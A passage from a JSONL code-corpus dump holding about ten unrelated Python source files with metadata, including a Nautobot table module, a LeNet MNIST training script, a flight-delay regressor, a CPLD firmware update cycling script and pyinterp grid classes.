final_dataset.drop(columns=['Date'])\n\nprint(final_dataset.columns.tolist())\n","sub_path":"AppliedTensorFlow/P2PreliminaryDataAnalysis/P6MergingData/P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586141573","text":"\ndef main():\n list = [3,6,2,9,-1,10]\n\n print(solution(list))\n\n\n## Returns which side of a binary tree sums to a greater value\ndef solution(arr):\n level = None\n root = None\n\n sum_left = None\n sum_right = None\n\n i = 1\n i_ref = 1\n for n in arr:\n if level == None:\n level = 1;\n\n ## because we are doing level traversal, left and right indices would double each time\n if level > 1:\n i_ref = i_ref * 2\n\n if level == 1 and root == None:\n root = n\n level += 1\n continue\n\n if i_ref <= i < i_ref*2:\n sum_left += n\n else:\n sum_right += n\n\n i += 1\n\n if sum_left > sum_right:\n return sum_left\n else:\n return sum_right","sub_path":"btsum.py","file_name":"btsum.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525006506","text":"import django_tables2 as tables\n\nfrom nautobot.utilities.tables import (\n BaseTable,\n ButtonsColumn,\n LinkedCountColumn,\n TagColumn,\n ToggleColumn,\n)\nfrom .models import Tenant, TenantGroup\n\nMPTT_LINK = \"\"\"\n{% for i in record.get_ancestors %}\n \n{% endfor %}\n
{{ record.name }}\n\"\"\"\n\nCOL_TENANT = \"\"\"\n{% if record.tenant %}\n {{ record.tenant }}\n{% else %}\n —\n{% endif %}\n\"\"\"\n\n\n#\n# Tenant groups\n#\n\n\nclass TenantGroupTable(BaseTable):\n pk = ToggleColumn()\n name = tables.TemplateColumn(template_code=MPTT_LINK, orderable=False, attrs={\"td\": {\"class\": \"text-nowrap\"}})\n tenant_count = LinkedCountColumn(\n viewname=\"tenancy:tenant_list\",\n url_params={\"group\": \"slug\"},\n verbose_name=\"Tenants\",\n )\n actions = ButtonsColumn(TenantGroup, pk_field=\"slug\")\n\n class Meta(BaseTable.Meta):\n model = TenantGroup\n fields = (\"pk\", \"name\", \"tenant_count\", \"description\", \"slug\", \"actions\")\n default_columns = (\"pk\", \"name\", \"tenant_count\", \"description\", \"actions\")\n\n\n#\n# Tenants\n#\n\n\nclass TenantTable(BaseTable):\n pk = ToggleColumn()\n name = tables.LinkColumn()\n tags = TagColumn(url_name=\"tenancy:tenant_list\")\n\n class Meta(BaseTable.Meta):\n model = Tenant\n fields = (\"pk\", \"name\", \"slug\", \"group\", \"description\", \"tags\")\n default_columns = (\"pk\", \"name\", \"group\", \"description\")\n","sub_path":"nautobot/tenancy/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"54090404","text":"from twisted.internet.defer import inlineCallbacks\nfrom labrad.wrappers import connectAsync\n\nfrom conductor_device.conductor_parameter import ConductorParameter\n \nclass IsLocked(ConductorParameter):\n priority = 1\n busy = False\n locked_threshold = -10\n \n @inlineCallbacks\n def initialize(self):\n yield self.connect()\n # device name looks wrong, but is correct\n yield self.cxn.spectrum_analyzer.select_device('red_mot')\n \n @inlineCallbacks\n def update(self):\n if not self.busy:\n try:\n self.busy = True\n trace = yield self.cxn.spectrum_analyzer.trace()\n if max(trace) >= self.locked_threshold:\n self.value = True\n else:\n 
self.value = False\n yield self.cxn.beeper.beep('m2 verdi unlocked')\n except Exception as e:\n raise e\n finally:\n self.busy = False\n\n","sub_path":"conductor/devices/m2_verdi/is_locked.py","file_name":"is_locked.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532650000","text":"def celsius_from_fahrenheit(temp_c):\n \"\"\" Converts temperature from degrees F to degrees C\n\n :param temp_c: float with the temperature in degrees Celsius\n :return: float of temperature in degrees Fahrenheit\n \"\"\"\n temp_f = temp_c * 1.8 + 32\n\n return temp_f\n\n\ndef fever_detection(temp_list):\n max_temp = max(temp_list)\n is_fever = False\n temp_thresh = 100\n for temperature in temp_list:\n if temperature > temp_thresh:\n is_fever = True\n\n return max_temp, is_fever\n","sub_path":"temp_conversion_module.py","file_name":"temp_conversion_module.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34174527","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nfrom sklearn import preprocessing\n#import h5py\nfrom sqlalchemy import create_engine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\n#from sklearn.ensemble import AdaBoostRegressor\n#from sklearn.ensemble import ExtraTreesClassifier\n#from sklearn.feature_selection import SelectKBest\n#from sklearn.feature_selection import chi2\nfrom sklearn.model_selection import GridSearchCV\n\ndef main():\n\tflights = pd.read_csv('DelaysOnlyRegressorTop10.csv')\n\tprint(\"Loaded in all data...\")\n\n\torig_airports = flights['ORIGIN_AIRPORT'].tolist()\n\tdest_airports = flights['DESTINATION_AIRPORT'].tolist()\n\tmanufacts = flights['Manu'].tolist()\n\tmodels = flights['Model'].tolist()\n\tarr_sky = flights['arr_sky'].tolist()\n\tdept_sky = flights['dept_sky'].tolist()\n\tairlines = flights['AIRLINE'].tolist()\n\n\tle_airports = preprocessing.LabelEncoder()\n\tle_manu = preprocessing.LabelEncoder()\n\tle_model = preprocessing.LabelEncoder()\n\tle_sky = preprocessing.LabelEncoder()\n\tle_airline = preprocessing.LabelEncoder()\n\n\tle_airports.fit(orig_airports)\n\tle_manu.fit(manufacts)\n\tle_model.fit(models)\n\tle_sky.fit(arr_sky)\n\tle_airline.fit(airlines)\n\n\tenc_orig_airports = le_airports.transform(orig_airports)\n\tenc_dest_airports = le_airports.transform(dest_airports)\n\tenc_manufacts = le_manu.transform(manufacts)\n\tenc_models = le_model.transform(models)\n\tenc_arr_sky = le_sky.transform(arr_sky)\n\tenc_dept_sky = le_sky.transform(dept_sky)\n\tenc_airlines = le_airline.transform(airlines)\n\n\tflights['ORIGIN_AIRPORT'] = enc_orig_airports\n\tflights['DESTINATION_AIRPORT'] = enc_dest_airports\n\tflights['Model'] = enc_models\n\tflights['Manu'] = enc_manufacts\n\tflights['dept_sky'] = 
enc_dept_sky\n\tflights['arr_sky'] = enc_arr_sky\n\tflights['AIRLINE'] = enc_airlines\n\n\tfeatures = [i for i in list(flights) if i != \"ARRIVAL_DELAY\"]\n\n\tX = flights[features]\n\ty = flights[\"ARRIVAL_DELAY\"]\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)\n\tassert(len(X_train) != len(X_test))\n\tassert(len(X_train) == len(y_train))\n\tprint(\"Split inputs into training and testing ...\")\n\ttrainErrors = []\n\ttestErrors = []\n\n\tfor v in [1e-3,1e-2,1e-1]:\n\t\treg = DecisionTreeRegressor(min_samples_split = v) #min_impurity_split=v)\n\t\treg.fit(X_train, y_train)\n\t\ty_pred_train = reg.predict(X_train)\n\t\ty_pred_test = reg.predict(X_test)\n\t\tassert(len(y_pred_train) != len(y_pred_test))\n\t\tprint((v, mean_absolute_error(y_train, y_pred_train)), (v, mean_absolute_error(y_test, y_pred_test)))\n\t\ttrainErrors.append((v, mean_absolute_error(y_train, y_pred_train)))\n\t\ttestErrors.append((v, mean_absolute_error(y_test, y_pred_test)))\n\t\t\n\n\tprint('Training Errors:', trainErrors)\n\tprint('Test Errors:', testErrors)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Scripts/DecisionTreeRegressorDelaysOnly.py","file_name":"DecisionTreeRegressorDelaysOnly.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258243182","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n@AUTHOR:Joselyn Zhao\n@CONTACT:zhaojing17@foxmail.com\n@HOME_PAGE:joselynzhao.top\n@SOFTWERE:PyCharm\n@FILE:train.py\n@TIME:2019/6/22 20:50\n@DES:\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nold_v = tf.logging.get_verbosity()\ntf.logging.set_verbosity(tf.logging.ERROR)\nimport tensorflow.contrib.slim as slim\n\nfrom tensorflow.python.framework import graph_util\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom sklearn.utils import shuffle\n\nfrom lenet import *\n\nif __name__ ==\"__main__\":\n 
mnist = input_data.read_data_sets('../../../data/mnist', one_hot=True)\n x_test = np.reshape(mnist.test.images,[-1,28,28,1])\n x_test = np.pad(x_test, ((0, 0), (2, 2), (2, 2), (0, 0)), 'constant') # print(\"Updated Image Shape: {}\".format(X_train[0].shape))\n tf.logging.set_verbosity(old_v)\n\n iteratons = 1000\n batch_size = 8\n ma = 0\n sigma = 0.1\n lr = 0.01\n mylenet = Lenet(ma,sigma,lr)\n\n image_x = []\n image_y_acc = []\n image_y_loss = []\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for ii in range(iteratons):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n batch_xs = np.reshape(batch_xs,[-1,28,28,1])\n batch_xs = np.pad(batch_xs,((0, 0), (2, 2), (2, 2), (0, 0)), 'constant')\n sess.run(mylenet.train_op,feed_dict ={mylenet.x:batch_xs,mylenet.y_:batch_ys})\n if ii % 10 == 0:\n vali_batch_x,vali_batch_y = mnist.validation.next_batch(100)\n vali_batch_x = np.reshape(vali_batch_x,[-1,28,28,1])\n vali_batch_x = np.pad(vali_batch_x,((0, 0), (2, 2), (2, 2), (0, 0)), 'constant')\n acc,loss = sess.run([mylenet.accuracy,mylenet.loss],feed_dict ={mylenet.x:vali_batch_x,mylenet.y_:vali_batch_y})\n print(\"%5d: accuracy is: %4f , loss is : %4f 。\" % (ii, acc, loss))\n image_x.append(ii)\n image_y_acc.append(acc)\n image_y_loss.append(loss)\n\n plt.plot(image_x, image_y_acc, 'r', label=\"accuracy\")\n plt.plot(image_x, image_y_loss, 'g', label=\"loss\")\n plt.xlabel(\"iteration\")\n plt.ylabel(\"accuracy\")\n plt.title(\"acc_loss_v1\")\n plt.savefig('./save/acc_loss_v1.png')\n plt.show()\n\n print('[accuracy,loss]:', sess.run([mylenet.accuracy], feed_dict={mylenet.x:x_test,mylenet.y_:mnist.test.labels}))\n\n\n","sub_path":"DL_8/work/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347479389","text":"import subprocess\nimport sys\nimport argparse\nimport datetime\nimport time\nimport os\nimport 
shutil\n#===================================================================================\ndef Log(string):\n\tnow = datetime.datetime.today()\n\ttmp = \"[%02d/%02d %02d:%02d:%02d] %s\\n\"%(now.month, now.day, now.hour, now.minute, now.second, string)\n\tf = open(\"LOG.txt\", \"a\")\n\tf.write(tmp)\n\tf.close()\n\tprint(tmp.replace(\"\\n\",\"\"))\n#===================================================================================\ndef Reboot():\n\tLog(\"Reboot System in 10 Seconds\")\n\n\tfor i in range(10):\n\t\tprint(\"\t%d...\"%(10-i))\n\t\ttime.sleep(1)\n\n\tLog(\"Reboot System!!\")\n\tcmd = \"shutdown /r /f /t 0\"\n\tret = subprocess.call(cmd, shell=True, universal_newlines=True)\n\n\treturn ret\n#===================================================================================\ndef CPLD_Ver():\n\tcmd = \"ipmitool.exe -I wmi raw 0x30 0x33\"\n\tret = subprocess.check_output(cmd, shell=True, universal_newlines=True).split('\\n')\n\n\ttmp = ret[0].strip()\n\n\tif(tmp == \"01 00 02\"):\n\t\tver = \"1.0.2\"\n\telif(tmp == \"01 00 03\"):\n\t\tver = \"1.0.3\"\n\telse:\n\t\tver = \"0\"\n\n\treturn ver\n#===================================================================================\ndef Update_Cycle():\n\tf = open(\"CYCLE.txt\",\"r+\")\n\ttmp = int(f.read().strip(),10)\n\tf.seek(0)\n\tf.write(str(tmp+1))\n\tf.close()\n#===================================================================================\ndef GetVal(filename):\n\tf = open(filename,\"r\")\n\ttmp = int(f.read().strip(),10)\n\tf.close()\n\n\treturn tmp\n#===================================================================================\ndef Check_CPLD():\n\tLog(\"Check Current CPLD Version w/ Previous CPLD Version\")\n\n\tf = open(\"VER.txt\",\"r\")\n\told = f.read()\n\tf.close()\n\n\tnew = CPLD_Ver()\n\n\tLog(\"Previous CPLD Version: %s\"%(old))\n\tLog(\"Current CPLD Version: %s\"%(new))\n\n\tif(new == old):\n\t\tret = \"CPLD Update Fail (%s)\"%(new)\n\t\treturn ret\n\telif(new == \"1.0.2\" and 
old == \"1.0.3\"):\n\t\tf = open(\"VER.txt\",\"w\")\n\t\tf.write(new)\n\t\tf.close()\n\t\treturn 0\n\telif(new == \"1.0.3\" and old == \"1.0.2\"):\n\t\tf = open(\"VER.txt\",\"w\")\n\t\tf.write(new)\n\t\tf.close()\n\t\treturn 0\n\telse:\n\t\tret = \"Unknown Error\"%(new)\n\t\treturn ret\n#===================================================================================\ndef Remove():\n\ttmp_list = [\"CYCLE.txt\", \"MAX.txt\", \"LOG.txt\", \"cpld.txt\", \"VER.txt\"]\n\n\tfor i in tmp_list:\n\t\tif(os.path.exists(i) == True):\n\t\t\tos.remove(i)\n#===================================================================================\ndef Init():\n\tglobal args\n\n\tRemove()\n\n\tLog(\"SBS CPLD FW Upate, by CESBG-EPDI-TE\")\n\tLog(\"Total Test Cycle: %d\"%args.cycle)\n\tLog(\"Create CYCLE.txt, MAX.txt and VER.txt\")\n\n\tf = open(\"CYCLE.txt\",\"w\")\n\tf.write(str(0))\n\tf.close()\n\n\tf = open(\"MAX.txt\",\"w\")\n\tf.write(str(args.cycle))\n\tf.close()\n\n\tf = open(\"VER.txt\",\"w\")\n\tf.write(CPLD_Ver())\n\tf.close()\n\n\tLog(\"Test Initialization Finish!!\")\n#===================================================================================\ndef End():\n\tLog(\"Test End\")\n\tnow = datetime.datetime.now()\n\tfilename = \"Log_%02d%02d-%02d%02d.txt\"%(now.month, now.day, now.hour, now.minute)\n\tLog(\"Log Filename: %s\"%(filename))\n\tshutil.move(\"LOG.txt\", filename)\n\tRemove()\n\tos.system(\"pause\")\n#===================================================================================\ndef Update_CPLD():\n\tnew = CPLD_Ver()\n\n\tif(new == \"1.0.2\"):\n\t\tLog(\"Update CPLD FW to 1.0.3 ...\")\n\t\tcmd = \"CPLD_Firmware_VVWH6_WN64_1.0.3_A00.exe /f /s /log=cpld.txt\"\n\telif(new == \"1.0.3\"):\n\t\tLog(\"Update CPLD FW to 1.0.2 ...\")\n\t\tcmd = \"CPLD_Firmware_YTMHK_WN64_1.0.2_A00.exe /f /s /log=cpld.txt\"\n\telse:\n\t\treturn False\n\n\tif(os.path.exists(\"cpld.txt\") == True):\n\t\tos.remove(\"cpld.txt\")\n\n\tret = subprocess.call(cmd, shell=True, 
universal_newlines=True)\n\n\tf = open(\"cpld.txt\",\"r\")\n\tlog = f.readlines()\n\tf.close()\n\n\tfor i in log:\n\t\tif(\"Update Package finished. Exit code = 2\" in i):\n\t\t\treturn True\n\n\treturn False\n#===================================================================================\ndef main(argv):\n\tglobal args\n\n\tVER = \"1.0\"\n\n\topts = argparse.ArgumentParser(description = \"SBS CPLD FW Upate, by CESBG-EPDI-TE\\nVersion: %s\"%VER, epilog = \"Example: python SBS_CPLD.py -c 500\")\n\tgroup = opts.add_mutually_exclusive_group()\n\topts.add_argument('-v', '--version', action = 'version', version = VER, help = \"Show Version\")\n\tgroup.add_argument('-c', '--cycle', type = int, required = False, default = 0, help = \"Test Cycle\")\n\tgroup.add_argument('-r', '--remove', action = \"store_true\", required = False, help = \"Remove Template File\")\n\tgroup.add_argument('-d', '--debug', type = int, required = False, help = \"Debug Command\")\n\n\n\targs = opts.parse_args()\n\n\tif(args.debug == 16697):\n\t\tprint(CPLD_Ver())\n\t\treturn\n\telif(args.debug == 12345):\n\t\tUpdate_CPLD()\n\t\treturn\n\telif(args.debug == 11111):\n\t\tReboot()\n\t\treturn\n\telif(args.remove == True):\n\t\tRemove()\n\t\treturn\n\telif(args.cycle > 0):\n\t\tInit()\n\t\tLog(\"Current CPLD Version: %s\"%(CPLD_Ver()))\n\t\tret = Update_CPLD()\n\t\tif(ret == False):\n\t\t\tLog(\"Update CPLD FW Fail!!\")\n\t\t\treturn\n\n\t\tUpdate_Cycle()\n\t\tReboot()\n\telif(os.path.exists(\"CYCLE.txt\") == True and os.path.exists(\"MAX.txt\") == True and os.path.exists(\"VER.txt\") == True):\n\t\tcycle = GetVal(\"CYCLE.txt\")\n\t\tmax = GetVal(\"MAX.txt\")\n\n\t\tLog(\"Cycle[%d/%d]...\"%(cycle,max))\n\n\t\tret = Check_CPLD()\n\t\tif(ret != 0):\n\t\t\tLog(ret)\n\t\t\treturn\n\n\t\tif(cycle < max):\n\t\t\tret = Update_CPLD()\n\t\t\tif(ret == True):\n\t\t\t\tLog(\"Cycle[%d/%d]: Pass!!\"%(cycle,max))\n\t\t\t\tUpdate_Cycle()\n\t\t\t\tReboot()\n\t\t\telse:\n\t\t\t\tLog(\"Update CPLD FW 
Fail!!\")\n\t\telif(cycle == max):\n\t\t\tLog(\"Cycle[%d/%d]: Pass!!\"%(cycle,max))\n\t\t\tLog(\"Current CPLD Version: %s\"%(CPLD_Ver()))\n\t\t\tEnd()\n\telse:\n\t\topts.print_help()\n\n\treturn\n#===================================================================================\nif(__name__ == \"__main__\"):\n\ttry:\n\t\tmain(sys.argv)\n\texcept Exception as e:\n\t\tprint(\"ERROR: %s\"%(str(e)))\n\t\tsys.exit(-1)\n\tsys.exit(0)\n","sub_path":"Module/SBS_CPLD.py","file_name":"SBS_CPLD.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63171956","text":"import slimPre\nimport numpy as np\n\nrun_dir = 'data/'\nslimPre.make_directory(run_dir)\n\nslimPre.write_file(run_dir+'bath.nc',None,None,[('bath',1000)])\n\nmesh_file = 'square.msh'\n\nprint('Extruding mesh')\ndef shiftOperation(node, iPerBound) :\n n = [node[0] - 1.6e5, node[1], node[2]]\n return n\ncutTags = [\"cut\"]\npasteTags = [\"paste\"]\nmapFilename = \"periodicMesh.txt\"\nperiodicity = (shiftOperation, cutTags, pasteTags, mapFilename)\n\nnPart = 96\nslimPre.dgpy.dgMeshPartition(mesh_file, nPart)\nmesh_file = mesh_file[:-4] + '_' + str(nPart)+'.msh'\n\nslimPre.extrude(mesh_file, (run_dir+'bath.nc','bath'), nb_layers=20, mesh_file_name_out=run_dir+'mesh3d.msh', periodicity=periodicity)\n\nprint('Loading 3D mesh')\nmesh_file = run_dir + \"mesh3d.msh\"\n\nmesh = slimPre.Mesh(mesh_file)\nregion_global = slimPre.Region(mesh)\n\nprint('Preprocessing coriolis')\nxyz = region_global.coordinates\ncoriolis = -1.2e-4\nslimPre.write_file(run_dir+'coriolis.nc', region=None, time=None, data=[('coriolis', coriolis)])\nslimPre.netcdf_to_msh(mesh_file, run_dir+'coriolis.nc', 'coriolis', 'coriolis')\n\nprint('Preprocessing initial temperature')\nxyz = region_global.coordinates\ntheta0 = 10.1 + 3*(-975.-xyz[:,2])/(-975.)\nyw = 2.5e5-4e4*np.sin(2*np.pi*3*xyz[:,0]/1.6e5)\nfact = 1. 
- (xyz[:,1]-yw[:])/4.e4\nindx = fact < 0.\nfact[indx] = 0.\nindx = fact > 1.\nfact[indx] = 1.\ntheta = theta0[:]-1.2*fact[:]\n\nyw_t = 2.5e5-2.0e4*np.sin(np.pi*(xyz[:,0]-1.1e5)/2.0e4)\ntheta_t = 0.3*(1.0 - (xyz[:,1] - yw_t)/2.0e4)\nindx = (xyz[:,0] > 1.1e5) * (xyz[:,0] < 1.3e5) * (xyz[:,1] > yw_t[:] - 2.0e4) * (xyz[:,1] < yw_t[:] + 2.0e4)\ntheta[indx] += theta_t[indx]\n\nslimPre.write_file(run_dir+'initialTemp.nc', region=region_global, time=None, data=[('temp', theta)])\nslimPre.netcdf_to_msh(mesh_file, run_dir+'initialTemp.nc', 'temp', 'temp')\n\nprint('preprocessing done')\nslimPre.exit(0)\n","sub_path":"baroclinic_eddies/ilicak/prepro.py","file_name":"prepro.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629737784","text":"import unittest\nimport doctest\nimport tempfile\nimport os\nimport sys\nfrom contextlib import contextmanager\nfrom pkg_resources import working_set, resource_filename\n\nfrom zc.buildout.easy_install import install\nfrom zc.buildout import testing\n\nfrom hurry import resource\n\n@contextmanager\ndef pwd(directory):\n before = os.getcwd()\n os.chdir(directory)\n yield\n os.chdir(before)\n\n\ndef setUp(test):\n test.target_dir = tempfile.mkdtemp('hurry.resource.test-installs')\n\n # Inspired by the test setup from z3c.autoinclude.\n project_dir = resource_filename('hurry.resource', 'testdata/MyPackage')\n dist_dir = os.path.join(project_dir, 'dist')\n\n if os.path.isdir(dist_dir):\n testing.rmdir(dist_dir)\n\n with pwd(project_dir):\n testing.system('%s setup.py sdist' % (sys.executable))\n\n new_working_set = install(['mypackage'],\n test.target_dir,\n links=[dist_dir],\n working_set=working_set)\n\n # we must perform a magical incantation on each distribution\n for dist in new_working_set:\n dist.activate()\n\n\ndef tearDown(test):\n testing.remove(test.target_dir)\n\n\nclass ConfigTests(unittest.TestCase):\n pass\n\n # def 
test_library_url(self):\n # library = resource.Library('foo', '')\n # inclusion = resource.ResourceInclusion(library, 'bar.js')\n # needed = resource.NeededInclusions()\n # needed.base_url = 'http://localhost/static'\n # print needed.library_url(library)\n # self.assertEquals('http://localhost/static:hash:2797572843/foo/',\n # needed.library_url(library)) \n\ndef test_suite():\n suite = unittest.makeSuite(ConfigTests)\n readme = doctest.DocFileSuite(\n 'README.txt',\n setUp=setUp,\n tearDown=tearDown,\n optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)\n suite.addTest(readme)\n return suite\n","sub_path":"hurry.resource/branches/janjaapdriessen-resource-publisher/src/hurry/resource/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275470035","text":"# Copyright (c) 2023 CNES\n#\n# All rights reserved. Use of this source code is governed by a\n# BSD-style license that can be found in the LICENSE file.\n\"\"\"\nRegular grids\n=============\n\"\"\"\nfrom typing import Optional, Union\n\nimport numpy\n\nfrom . import core, interface\n\n\nclass Grid2D:\n \"\"\"2D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis): Y-Axis.\n array (numpy.ndarray): Discrete representation of a continuous function\n on a uniform 2-dimensional grid.\n increasing_axes: Optional string indicating how to ensure that the grid\n axes are increasing. If axes are decreasing, the axes and grid\n provided will be flipped in place or copied before being flipped. By\n default, the decreasing axes are not modified.\n\n Examples:\n\n >>> import numpy as np\n >>> import pyinterp\n >>> x_axis = pyinterp.Axis(numpy.arange(-180.0, 180.0, 1.0),\n ... is_circle=True)\n >>> y_axis = pyinterp.Axis(numpy.arange(-80.0, 80.0, 1.0),\n ... 
is_circle=False)\n >>> array = numpy.zeros((len(x_axis), len(y_axis)))\n >>> grid = pyinterp.Grid2D(x_axis, y_axis, array)\n >>> grid\n \n array([[0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n ...,\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.]])\n Axis:\n * x: \n min_value: -180.0\n max_value: 179.0\n step: 1.0\n is_circle: True\n * y: \n min_value: -80.0\n max_value: 79.0\n step: 1.0\n is_circle: False\n \"\"\"\n #: The number of grid dimensions handled by this object.\n _DIMENSIONS = 2\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n prefix = ''\n for idx, item in enumerate(args):\n if isinstance(item, core.TemporalAxis):\n prefix = 'Temporal'\n break\n _class = f'{prefix}Grid{self._DIMENSIONS}D' + \\\n interface._core_class_suffix(args[-1], handle_integer=True)\n if increasing_axes is not None:\n if increasing_axes not in ['inplace', 'copy']:\n raise ValueError('increasing_axes '\n f'{increasing_axes!r} is not defined')\n inplace = increasing_axes == 'inplace'\n # Tuple does not support item assignment\n args = list(args)\n for idx, item in enumerate(args):\n if isinstance(item,\n (core.Axis,\n core.TemporalAxis)) and not item.is_ascending():\n args[idx] = item.flip(inplace=inplace)\n args[-1] = numpy.flip(args[-1], axis=idx)\n self._instance = getattr(core, _class)(*args)\n self._prefix = prefix\n\n def __repr__(self):\n \"\"\"Called by the ``repr()`` built-in function to compute the string\n representation of this instance.\"\"\"\n\n def pad(string, length):\n \"\"\"Pad a string to a given length.\"\"\"\n return '\\n'.join([(' ' * length if ix else '') + line\n for ix, line in enumerate(string.split('\\n'))])\n\n result = [\n f'<{self.__module__}.{self.__class__.__name__}>',\n repr(self.array),\n ]\n result.append('Axis:')\n for item in dir(self):\n attr = getattr(self, item)\n if isinstance(attr, (core.Axis, core.TemporalAxis)):\n 
prefix = f'* {item}: '\n result.append(f' {prefix}{pad(repr(attr), len(prefix))}')\n return '\\n'.join(result)\n\n @property\n def x(self) -> core.Axis:\n \"\"\"Gets the X-Axis handled by this instance.\n\n Returns:\n X-Axis.\n \"\"\"\n return self._instance.x\n\n @property\n def y(self) -> core.Axis:\n \"\"\"Gets the Y-Axis handled by this instance.\n\n Returns:\n Y-Axis.\n \"\"\"\n return self._instance.y\n\n @property\n def array(self) -> numpy.ndarray:\n \"\"\"Gets the values handled by this instance.\n\n Returns:\n numpy.ndarray: values.\n \"\"\"\n return self._instance.array\n\n\nclass Grid3D(Grid2D):\n \"\"\"3D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis, pyinterp.TemporalAxis): Y-Axis.\n z (pyinterp.Axis): Z-Axis.\n array (numpy.ndarray): Discrete representation of a continuous function\n on a uniform 3-dimensional grid.\n increasing_axes: Ensure that the axes of the grid are increasing. If\n this is not the case, the axes and grid provided will be flipped.\n Default to False.\n\n .. note::\n\n If the Z axis is a :py:class:`temporal axis\n `, the grid will handle this axis during\n interpolations as a time axis.\n\n Examples:\n\n >>> import numpy as np\n >>> import pyinterp\n >>> x_axis = pyinterp.Axis(numpy.arange(-180.0, 180.0, 1.0),\n ... is_circle=True)\n >>> y_axis = pyinterp.Axis(numpy.arange(-80.0, 80.0, 1.0),\n ... is_circle=False)\n >>> z_axis = pyinterp.TemporalAxis(\n ... 
numpy.array(['2000-01-01'], dtype=\"datetime64[s]\"))\n >>> array = numpy.zeros((len(x_axis), len(y_axis), len(z_axis)))\n >>> grid = pyinterp.Grid3D(x_axis, y_axis, z_axis, array)\n \"\"\"\n _DIMENSIONS = 3\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n super().__init__(*args, increasing_axes=increasing_axes)\n\n @property\n def z(self) -> Union[core.Axis, core.TemporalAxis]:\n \"\"\"Gets the Z-Axis handled by this instance.\n\n Returns:\n Z-Axis.\n \"\"\"\n return self._instance.z\n\n\nclass Grid4D(Grid3D):\n \"\"\"4D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis): Y-Axis.\n z (pyinterp.Axis, pyinterp.TemporalAxis): Z-Axis.\n u (pyinterp.Axis): U-Axis.\n array (numpy.ndarray): Discrete representation of a continuous\n function on a uniform 4-dimensional grid.\n increasing_axes: Ensure that the axes of the grid are increasing.\n If this is not the case, the axes and grid provided will be\n flipped. Default to False.\n\n .. note::\n\n If the Z axis is a temporal axis, the grid will handle this axis\n during interpolations as a time axis.\n \"\"\"\n _DIMENSIONS = 4\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n super().__init__(*args, increasing_axes=increasing_axes)\n\n @property\n def u(self) -> core.Axis:\n \"\"\"Gets the U-Axis handled by this instance.\n\n Returns:\n U-Axis.\n \"\"\"\n return self._instance.u\n\n\ndef _core_variate_interpolator(instance: object, interpolator: str, **kwargs):\n \"\"\"Obtain the interpolator from the string provided.\"\"\"\n if isinstance(instance, Grid2D):\n dimensions = instance._DIMENSIONS\n # 4D interpolation uses the 3D interpolator\n if dimensions > 3:\n dimensions -= 1\n else:\n raise TypeError('instance is not an object handling a grid.')\n\n prefix = instance._prefix\n\n if interpolator == 'bilinear':\n return getattr(core, f'{prefix}Bilinear{dimensions}D')(**kwargs)\n if interpolator == 'nearest':\n return getattr(core, 
f'{prefix}Nearest{dimensions}D')(**kwargs)\n if interpolator == 'inverse_distance_weighting':\n return getattr(\n core, f'{prefix}InverseDistanceWeighting{dimensions}D')(**kwargs)\n\n raise ValueError(f'interpolator {interpolator!r} is not defined')\n","sub_path":"src/pyinterp/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204210888","text":"#positions command\n#only works if units are in remote control mode\n#units need to be initialised, run init.py beforehand, if this is not the case\n#set fixed positions for all units, or for each unit individually\n#specifying just a single position will lead to a movement of all 3 units (e.g. pos 5000)\n#send position to a certain unit (1, 2, 3) when different positions are specified (e.g. pos.py 5000 5500 6000)\n#a unit will not be moved if the position is set to x (e.g. pos.py 